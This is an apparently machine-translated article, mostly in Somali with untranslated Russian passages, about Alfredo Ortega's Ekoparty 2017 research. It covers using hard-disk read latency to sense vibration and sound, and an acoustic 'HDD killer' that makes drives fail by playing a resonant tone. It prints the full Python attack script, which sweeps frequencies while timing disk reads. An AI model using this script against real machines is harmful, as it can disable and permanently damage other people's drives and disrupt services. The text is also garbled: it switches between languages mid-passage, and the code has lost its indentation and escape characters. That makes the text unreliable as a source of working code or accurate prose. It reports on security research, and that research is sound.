Shirkii amniga kumbuyuutarka ee Ekoparty 2017 ee Buenos Aires, hacker Argentine Alfredo Ortega wuxuu muujiyay horumar aad u xiiso badan - nidaam loogu talagalay dhageysiga qarsoodiga ah ee dhismaha iyada oo aan la isticmaalin makarafoon. Cod !
HDD-gu inta badan waxa uu soo qaadaa dhawaqyo hooseeya oo xoog badan, raad-raacyo iyo gariiryo kale. Hadalka bini'aadamka weli lama aqoonsan karo, inkastoo saynisyahano (Aqoonsiga hadalka ee gariirada soo noqnoqda ee hooseeya, kuwaas oo laga duubay, tusaale ahaan, gyroscope ama HDD).
Codku waa gariirka hawada ama dhexdhexaad kale. Qofku waxa uu ka gartaa xuubka dhegta, kaas oo gariir u gudbiya dhegta gudaha. Makarafoonka waxa loo qaabeeyey qiyaas ahaan sida dhegta oo kale - halkan, sidoo kale, gariirada waxaa duubaya xuub khafiif ah, kaas oo kicinaya dareenka korantada. Dareewalka adag, dabcan, wuxuu sidoo kale ku xiran yahay gariirka yar yar sababtoo ah isbeddelka hawada ku wareegsan. Tan waxaa lagu yaqaanaa xitaa sifooyinka farsamada ee HDD-yada: soosaarayaashu waxay inta badan muujiyaan heerka gariirka ugu badan ee la oggol yahay, darawalka adag laftiisu wuxuu inta badan isku dayaa inuu geliyo weel aan gariirka lahayn oo ka samaysan caag ama walxo kale oo dahaarka ah. Halkaa way fududahay in la soo gabagabeeyo in dhawaaqyada lagu duubi karo HDD. Waxa hadhay oo dhan waa in la ogaado sida.
Alfredo Ortega waxa uu soo jeediyay nooc gaar ah oo ah weerarka kanaalka, kaas oo ah weerar waqti. Weerarkani wuxuu ku salaysan yahay malo ah in hawlo kala duwan lagu sameeyo qalabka waqtiyo kala duwan, iyadoo ku xiran xogta la soo geliyay. Xaaladdan oo kale, "xogta gelinta" waa gariirada madaxa akhriska iyo saxanadda HDD, kaas oo la xidhiidha gariirka deegaanka, taas oo ah, codka. Sidaa darteed, marka la cabbiro wakhtiga xisaabinta iyo samaynta falanqaynta tirakoobka ee xogta, gariirrada madaxa / saxanka iyo markaa gariirada dhexdhexaadiyaha ayaa la qiyaasi karaa. Markasta oo ay dheeraato daahida akhriska xogta, waxaa sii xoogeysanaya gariirada HDD-ga, sidaas darteed, codka ayaa sii kordha.
Sidee loo cabbiraa gariirada darawalka adag? Aad u fudud: kaliya socodsii nidaamka wicitaanka read () - oo qor wakhtiga ay qaadanayso dhamaystirka. Nidaamyada hawlgalka casriga ah waxay kuu oggolaanayaan inaad akhrido wakhtiga wicitaannada nidaamka oo leh saxnaan nanosecond.
Xawaaraha akhrinta macluumaadka waaxdu waxay ku xidhan tahay booska madaxa iyo saxanadda, kaas oo xidhiidh la leh gariirada kiis HDD. Waa intaas.
Falanqaynta tirakoobka waxaa lagu fuliyaa iyadoo la isticmaalayo utility Kscope fudud. Sida ay yiraahdaan, wax kasta oo xariif ah ayaa fudud.
Kscope utility (stat() syscall)
Kscope waa utility yar oo lagu arki karo kala duwanaanshiyaha yar ee nidaamka wicitaanka waqtiyada fulinta. Xigasho.
Bakhaar gaar ah waxaa jira nooc ka mid ah utility-ga loo habeeyey weerar waqti ah oo ku saabsan dariiqa adag, taas oo ah, loo habeeyey si loo falanqeeyo wicitaanka nidaamka read ().
Muujinta duubista codka iyadoo la adeegsanayo HDD, hawlgalka utility Kscope
Dabcan hadalka sidaa laguma fahmi karo, laakiin HDD-gu aad buu ugu habboon yahay dareemaha gariirka. Tusaale ahaan, waad isdiiwaangelin kartaa haddii qof xidhan kabo adag ama kabo-la'aan uu soo galo qol kombuyuutar wata (malaha, haddii qofka weerarka geystay uu xidhan yahay kabo jilicsan ama uu jiro rooga qaro weyn oo dhulka ah, HDD ma awoodi doono inuu diiwaangeliyo gariirka - tani waa mid mudan in la hubiyo). Kumbuyuutarku wuxuu awood u leeyahay inuu diiwaangeliyo muraayadaha jaban ama dhacdooyinka kale ee leh xoojinta codka. Taasi waa, darawalka adagi wuxuu u adeegi karaa nooc ka mid ah nidaamka ogaanshaha galitaanka aan la fasaxin.
Dilaaga HDD
Кстати, схожую технику можно использовать для выведения из строя жёстких дисков. Только здесь мы не снимаем колебания с HDD, а наоборот — генерируем колебания, которые подаются на HDD. Если воспроизводить с колонки звук на частоте, которая резонирует с частотой HDD, то система вскоре отключает устройство с ошибкой ввода-вывода (ядро Linux полностью отключает HDD через 120 секунд). Сам жёсткий диск может получить необратимые повреждения.
Muhiim Linux отключило жёсткий диск после 120 секунд подачи звука на резонирующей частоте через динамик USB-колонки Edifier r19u. Динамик включен примерно на четверть мощности (менее 100 мВт) и располагается в 20 см от HDD, направлен на стол для усиления вибраций. Кадр из iyadoo lagu muujinayo dilaaga HDD
Waxaa la yaab leh in "weerarada" noocan oo kale ah ee HDD-yada ay mararka qaarkood si buuxda u dhacaan nolol maalmeedka. Tusaale ahaan, Sebtembar 2016, xarunta xogta ING Bank ayaa lagu qasbay inay hakiso howlaheeda 10 saacadood ka dib markii la sameeyay dab-damis. iyadoo ay ugu wacan tahay dhawaqa dheer ee gaasta aan shaqayn ee laga sii daayo dhululubada oo cadaadis sare saaran yahay. Codku aad buu u dheeraa (in ka badan 130 dB), laakiin xitaa kuma qaylin kartid darawallada adag - tani waxay kordhinaysaa dib u dhaca gelitaanka HDD.
Muujinta qaylada bini'aadamka ee darawalada adag ee xarunta xogta. Cabbirka daahitaanka
Si loo dhaliyo codka soo noqnoqda, Alfredo Ortega wuxuu qoray qoraal Python ah oo la yiraahdo ().
Aad bay u yar tahay, markaa waxaad ku daabici kartaa gebi ahaanba halkan.
"""PyAudio hdd-killer: Generate sound and interfere with HDD """
"""Alfredo Ortega @ortegaalfredo"""
"""Usage: hdd-killer /dev/sdX"""
"""Where /dev/sdX is a spinning hard-disk drive"""
"""Turn the volume to the max for better results"""
"""Requires: pyaudio. Install with 'sudo pip install pyaudio' or 'sudo apt-get install python-pyaudio'"""
import pyaudio
import time
import sys
import math
import random
RATE=48000
FREQ=50
# validation. If a disk hasn't been specified, exit.
if len(sys.argv) < 2:
print "hdd-killer: Attempt to interfere with a hard disk, using sound.nn" +
"The disk will be opened as read-only.n" +
"Warning: It might cause damage to HDD.n" +
"Usage: %s /dev/sdX" % sys.argv[0]
sys.exit(-1)
# instantiate PyAudio (1)
p = pyaudio.PyAudio()
x1=0
NEWFREQ=FREQ
# define audio synt callback (2)
def callback(in_data, frame_count, time_info, status):
global x1,FREQ,NEWFREQ
data=''
sample=0
for x in xrange(frame_count):
oldsample=sample
sample=chr(int(math.sin(x1*((2*math.pi)/(RATE/FREQ)))*127)+128)
data = data+sample
# continous frequency change
if (NEWFREQ!=FREQ) and (sample==chr(128)) and (oldsample<sample) :
FREQ=NEWFREQ
x1=0
x1+=1
return (data, pyaudio.paContinue)
# open stream using callback (3)
stream = p.open(format=pyaudio.paUInt8,
channels=1,
rate=RATE,
output=True,
stream_callback=callback)
# start the stream (4)
stream.start_stream()
# wait for stream to finish (5)
while stream.is_active():
timeprom=0
c=file(sys.argv[1])
for i in xrange(20):
a=time.clock()
c.seek(random.randint(0,1000000000),1) #attempt to bypass file buffer
c.read(51200)
b=time.clock()
timeprom+=b-a
c.close()
timeprom/=20
print("Frequency: %.2f Hz File Read prom: %f us" % (FREQ,timeprom*1000000))
NEWFREQ+=0.5
# stop stream (6)
stream.stop_stream()
stream.close()
# close PyAudio (7)
p.terminate()Source: www.habr.com
